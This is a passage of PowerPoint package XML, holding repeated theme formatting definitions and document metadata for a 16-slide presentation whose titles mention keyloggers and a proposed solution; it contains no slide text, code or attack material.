        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme3.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme4.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme5.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme6.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme7.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme8.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="100000"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </a:bgFillStyleLst>
    </a:fmtScheme>
  </a:themeElements>
  <a:objectDefaults/>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme9.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majorFont>
      <a:minorFont>
        <a:latin typeface="Franklin Gothic Book" panose="020B0502020104020203"/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="98000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="84000">
              <a:schemeClr val="phClr">
                <a:shade val="90000"/>
                <a:lumMod val="88000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="0"/>
          <a:tileRect/>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a:gradFill>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:tint val="90000"/>
                <a:lumMod val="110000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="98000"/>
                <a:lumMod val="86000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="50000" t="50000" r="100000" b="10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Future forward</Template>
  <TotalTime>26</TotalTime>
  <Words>1020</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>107</Paragraphs>
  <Slides>16</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>11</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>16</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="27" baseType="lpstr">
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>keyloggers</vt:lpstr>
      <vt:lpstr>OUTLINE</vt:lpstr>
      <vt:lpstr>Problem Statement</vt:lpstr>
      <vt:lpstr>Proposed Solution</vt:lpstr>
      <vt:lpstr>System  Approach</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment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subject/>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>bhavani kannan</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-19T06:51:14Z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PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>16</vt:i4>
  </property>
</Properties>
</file>